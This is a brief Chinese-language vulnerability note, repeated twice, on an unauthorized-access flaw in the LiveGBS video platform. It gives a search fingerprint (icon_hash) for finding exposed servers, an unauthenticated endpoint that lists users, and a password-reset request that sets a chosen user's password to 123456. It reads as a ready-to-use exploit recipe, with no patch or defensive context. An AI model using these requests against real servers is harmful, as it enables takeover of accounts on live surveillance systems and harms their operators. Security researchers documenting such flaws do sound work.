LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码
icon_hash="-206100324"/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc
/api/v1/user/resetpassword?id=22&password=123456
LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码
icon_hash="-206100324"/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc
/api/v1/user/resetpassword?id=22&password=123456
